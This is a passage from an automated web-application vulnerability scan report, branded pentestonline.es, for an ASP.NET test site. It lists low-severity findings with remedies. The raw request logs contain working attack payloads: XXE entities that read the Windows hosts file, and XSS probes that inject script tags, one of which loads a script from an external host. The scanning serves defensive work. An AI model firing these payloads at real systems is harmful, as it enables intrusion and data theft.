<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'+"<"+"/script>"); </script>
<![endif]-->


<!-- Pixel Admin's javascripts -->
<script src="assets/javascripts/bootstrap.min.js"></script>


6. Autocomplete Enabled

2 TOTAL
LOW
Confirmed
2

pentestonline.es detected that autocomplete is enabled in one or more of the form fields which might contain sensitive information like "username", "credit card" or "CVV".

Impact

If user chooses to save, data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers, such as cyber cafes or airport terminals.

Actions to Take

  1. Add the attribute autocomplete="off" to the form tag or to individual "input" fields.
  2. Find all instances of inputs that store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure all of the fixes have been applied properly.

Required Skills for Successful Exploitation

First and foremost, attacker needs either physical access or user-level code execution rights for successful exploitation. Dumping all data from a browser can be fairly easy, and a number of automated tools exist to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the autocomplete feature to see previously entered values.

External References

Classification

OWASP 2017-A6

6.1. http://test.q2bstudio.com/

Confirmed
http://test.q2bstudio.com/

Identified Field Name

username_id

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



</div>
<!-- / .signin-text -->

<div class="col-sm-12 align_middle_login">
<div class="form-group w-icon">


<input name="username_id" type="text" id="username_id" class="form-control input-lg format_input_login" placeholder="Email" />
<span class="fa fa-user signin-form-icon"></span>
</div>
<!-- / Username -->

<div class="form-group w-icon">


6.2. http://test.q2bstudio.com/

Confirmed
http://test.q2bstudio.com/

Identified Field Name

username_id

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 124
Content-Type: application/xml
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>

Response



</div>
<!-- / .signin-text -->

<div class="col-sm-12 align_middle_login">
<div class="form-group w-icon">


<input name="username_id" type="text" id="username_id" class="form-control input-lg format_input_login" placeholder="Email" />
<span class="fa fa-user signin-form-icon"></span>
</div>
<!-- / Username -->

<div class="form-group w-icon">


7. Cookie Not Marked as HttpOnly

1 TOTAL
LOW
Confirmed
1

pentestonline.es identified a cookie not marked as HTTPOnly.

HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

Impact

During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP 2017-A6

7.1. http://test.q2bstudio.com/

Confirmed
http://test.q2bstudio.com/

Identified Cookie(s)

q2blng

Cookie Source

HTTP Header

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Set-Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; path=/; HttpOnly
Set-Cookie: q2blng=ca-ES; expires=Wed, 05-Feb-2020 12:43:22 GMT; path=/

X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3261
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:22 GMT
Cache-Control: private



<!DO

8. Version Disclosure (ASP.NET)

1 TOTAL
LOW

pentestonline.es identified a version disclosure (ASP.NET) in target web server's HTTP response.

This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of ASP.NET.

Impact

An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Remedy

Apply the following changes to your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
     <httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

Classification

OWASP 2017-A6

8.1. http://test.q2bstudio.com/?%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fen5k_y54-pfmmjdpxw0jylmw7ejnljou7quqmkj2ius%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e

http://test.q2bstudio.com/?%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fe...

ExtractedVersion

Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3429.0

Certainty

Request

GET /?%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fen5k_y54-pfmmjdpxw0jylmw7ejnljou7quqmkj2ius%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



e></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3429.0


</font>

</body>
</html>
<!--
[HttpRequestValidationException]: A potentially dangerous Request.QueryString value was detected from the client (=&quot;&#39;&quot;--&gt;&lt;/st

9. Programming Error Message

4 TOTAL
LOW

pentestonline.es identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. data may be disclosed. Most of these issues will be identified and reported separately by pentestonline.es.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database, then show this number and a static user-friendly error message to the user.

Classification

OWASP 2017-A6

9.1. http://test.q2bstudio.com/trace.axd

http://test.q2bstudio.com/trace.axd

IdentifiedErrorMessage

Exception of type &#39;System.Web.HttpException&#39; was thrown.

Certainty

Request

GET /trace.axd HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/trace.axd
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3429.0

</font>

</body>
</html>
<!--
[HttpException]: Exception of type &#39;System.Web.HttpException&#39; was thrown.
at System.Web.Handlers.TraceHandler.System.Web.IHttpHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionSte

9.2. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Parameters

Parameter Type Value
username_id POST
__VIEWSTATE POST
__VIEWSTATE_KEY POST <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32...
ctl01 POST Inicia sesión
password_id POST

IdentifiedErrorMessage

Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.

Certainty

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 284
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

username_id=&__VIEWSTATE=&__VIEWSTATE_KEY=%3c%3fxml+version%3d%221.0%22%3f%3e%3c!DOCTYPE+ns+%5b%3c!ELEMENT+ns+ANY%3e%3c!ENTITY+lfi+SYSTEM+%22file%3a%2f%2f%2fC%3a%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts%22%3e%5d%3e%3cns%3e%26lfi%3b%3c%2fns%3e&ctl01=Inicia+sesi%c3%b3n&password_id=

Response



s:line 41
at System.Web.UI.Page.LoadAllState()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.

9.3. http://test.q2bstudio.com/trace.axd

http://test.q2bstudio.com/trace.axd

IdentifiedErrorMessage

Exception of type &#39;System.Web.HttpException&#39; was thrown.

Certainty

Request

POST /trace.axd HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 124
Content-Type: application/xml
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/trace.axd
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>

Response



=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3429.0

</font>

</body>
</html>
<!--
[HttpException]: Exception of type &#39;System.Web.HttpException&#39; was thrown.
at System.Web.Handlers.TraceHandler.System.Web.IHttpHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionSte

9.4. http://test.q2bstudio.com/trace.axd/%22ns=%22pentestonline.es(0x000A1B)

http://test.q2bstudio.com/trace.axd/%22ns=%22pentestonline.es(0x000A1B)

Parameters

Parameter Type Value
URI-BASED Full URL /"ns="pentestonline.es(0x000A1B)

IdentifiedErrorMessage

Exception of type &#39;System.Web.HttpException&#39; was thrown.

Certainty

Request

GET /trace.axd/%22ns=%22pentestonline.es(0x000A1B) HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/trace.axd
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3429.0

</font>

</body>
</html>
<!--
[HttpException]: Exception of type &#39;System.Web.HttpException&#39; was thrown.
at System.Web.Handlers.TraceHandler.System.Web.IHttpHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionSte

10. Stack Trace Disclosure (ASP.NET)

11 TOTAL
LOW

pentestonline.es identified a stack trace disclosure (ASP.NET) in the target web server's HTTP response.

Impact

An attacker can obtain information such as:
  • ASP.NET version.
  • Physical file path of temporary ASP.NET files.
  • Information about the generated exception and possibly source code, SQL queries, etc.
This information might help an attacker gain more information and potentially focus on the development of further attacks for the target system.

Remedy

Apply following changes on your web.config file to prevent information leakage by applying custom error pages.
<System.Web>
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

Classification

OWASP 2017-A6

10.1. http://test.q2bstudio.com/?%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fen5k_y54-pfmmjdpxw0jylmw7ejnljou7quqmkj2ius%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e

http://test.q2bstudio.com/?%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fe...

Parameters

Parameter Type Value
Query Based Query String '"--></style></scRipt><scRipt src="//en5k_y54-pfmmjdpxw0jylmw7ejnljou7quqmkj2ius&#46;r87&#46;me"></s...

Certainty

Request

GET /?%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fen5k_y54-pfmmjdpxw0jylmw7ejnljou7quqmkj2ius%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



ource File: </b> c:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\72737181\3efab75d\App_Web_ttvm1rai.4.cs<b> &nbsp;&nbsp; Line: </b> 0
<br><br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (=&quot;&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;sc...&quot;).

10.2. http://test.q2bstudio.com/assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000037)%3C/scRipt%3E

http://test.q2bstudio.com/assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000...

Parameters

Parameter Type Value
URI-BASED Full URL '"--></style></scRipt><scRipt>pentestonline.es(0x000037)</scRipt>

Certainty

Request

GET /assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000037)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

10.3. http://test.q2bstudio.com/assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000038)%3C/scRipt%3E

http://test.q2bstudio.com/assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000...

Parameters

Parameter Type Value
URI-BASED Full URL /'"--></style></scRipt><scRipt>pentestonline.es(0x000038)</scRipt>

Certainty

Request

GET /assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000038)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

10.4. http://test.q2bstudio.com/assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000163)%3C/scRipt%3E

http://test.q2bstudio.com/assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enets...

Parameters

Parameter Type Value
URI-BASED Full URL '"--></style></scRipt><scRipt>pentestonline.es(0x000163)</scRipt>

Certainty

Request

GET /assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000163)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

10.5. http://test.q2bstudio.com/assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000164)%3C/scRipt%3E

http://test.q2bstudio.com/assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enets...

Parameters

Parameter Type Value
URI-BASED Full URL /'"--></style></scRipt><scRipt>pentestonline.es(0x000164)</scRipt>

Certainty

Request

GET /assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000164)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

10.6. http://test.q2bstudio.com/trace.axd

http://test.q2bstudio.com/trace.axd

Certainty

Request

GET /trace.axd HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/trace.axd
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



.NET Framework Version:4.0.30319; ASP.NET Version:4.7.3429.0

</font>

</body>
</html>
<!--
[HttpException]: Exception of type &#39;System.Web.HttpException&#39; was thrown.
at System.Web.Handlers.TraceHandler.System.Web.IHttpHandler.ProcessRequest(HttpContext context)

at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()

at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)

at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)

--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode

10.7. http://test.q2bstudio.com/assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00028F)%3C/scRipt%3E

http://test.q2bstudio.com/assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(...

Parameters

Parameter Type Value
URI-BASED Full URL '"--></style></scRipt><scRipt>pentestonline.es(0x00028F)</scRipt>

Certainty

Request

GET /assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00028F)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

10.8. http://test.q2bstudio.com/assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000290)%3C/scRipt%3E

http://test.q2bstudio.com/assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(...

Parameters

Parameter Type Value
URI-BASED Full URL /'"--></style></scRipt><scRipt>pentestonline.es(0x000290)</scRipt>

Certainty

Request

GET /assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000290)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

10.9. http://test.q2bstudio.com/Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00033D)%3C/scRipt%3E

http://test.q2bstudio.com/Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x...

Parameters

Parameter Type Value
URI-BASED Full URL '"--></style></scRipt><scRipt>pentestonline.es(0x00033D)</scRipt>

Certainty

Request

GET /Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00033D)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

10.10. http://test.q2bstudio.com/Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000358)%3C/scRipt%3E

http://test.q2bstudio.com/Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x...

Parameters

Parameter Type Value
URI-BASED Full URL /'"--></style></scRipt><scRipt>pentestonline.es(0x000358)</scRipt>

Certainty

Request

GET /Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000358)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

10.11. http://test.q2bstudio.com/Resources/images/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00041F)%3C/scRipt%3E

http://test.q2bstudio.com/Resources/images/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetspa...

Parameters
